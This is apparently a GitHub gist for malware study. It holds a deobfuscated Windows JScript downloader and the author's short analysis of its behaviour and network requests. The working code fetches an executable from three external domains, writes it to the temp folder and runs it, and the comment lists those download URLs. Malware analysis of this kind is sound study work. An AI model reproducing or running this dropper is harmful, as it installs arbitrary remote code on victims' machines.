Skip to content

Instantly share code, notes, and snippets.

@jcesarstef

jcesarstef/REVERSED_20150814_4a28a7fe949b6e449bc8d595ca196417.js

Created March 14, 2019 23:23
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save jcesarstef/7523a3c5c46b238c8591e52954246deb to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save jcesarstef/7523a3c5c46b238c8591e52954246deb to your computer and use it in GitHub Desktop.
Download ZIP
#1 Simple malware deofuscation for for study purpose
Raw
REVERSED_20150814_4a28a7fe949b6e449bc8d595ca196417.js
// Source: https://github.com/HynekPetrak/javascript-malware-collection/blob/master/2015/20150814/20150814_4a28a7fe949b6e449bc8d595ca196417.js
var stroke = "5557545E0D0A020B24060108130B0B000A1D4A070B09";
var x = '';
var vi = '';
function dl(fr) {
var b = "idsecurednow.com laterrazzafiorita.it ihaveavoice2.com".split(" ");
for (var i = 0; i < b.length; i++) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
var dn = 0;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() {
if (xo.readyState == 4 && xo.status == 200) {
var xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(xo.ResponseBody);
if (xa.size > 5000) {
dn = 1;
xa.position = 0;
xa.saveToFile(fn, 2);
try {
ws.Run(fn, 1, 0);
} catch (er) {};
};
xa.close();
};
};
try {
xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + stroke, false);
xo.send();
} catch (er) {};
if (dn == 1) break;
};
};
dl(6441);
dl(802);
dl(1483);
@jcesarstef
Copy link
Author

jcesarstef commented Mar 14, 2019
edited
Loading

Questions

  1. What this malware do?
    Try to download an file(Line 32) to "%TEMP%\36619621.exe"(random number)(Line 11 / Line 23) then try to execute (Line 24)

  2. External requests

GET http://idsecurednow.com/document.php?rnd=6441&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://laterrazzafiorita.it/document.php?rnd=6441&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://ihaveavoice2.com/document.php?rnd=6441&id=5557545E0D0A020B24060108130B0B000A1D4A070B09

GET http://idsecurednow.com/document.php?rnd=802&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://laterrazzafiorita.it/document.php?rnd=802&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://ihaveavoice2.com/document.php?rnd=802&id=5557545E0D0A020B24060108130B0B000A1D4A070B09

GET http://idsecurednow.com/document.php?rnd=1483&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://laterrazzafiorita.it/document.php?rnd=1483&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://ihaveavoice2.com/document.php?rnd=1483&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
  1. What technologies does it use?
    Internet Explorer Browser
    Microsoft® JScript® (ActiveXObject) - To interact with application from target host

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment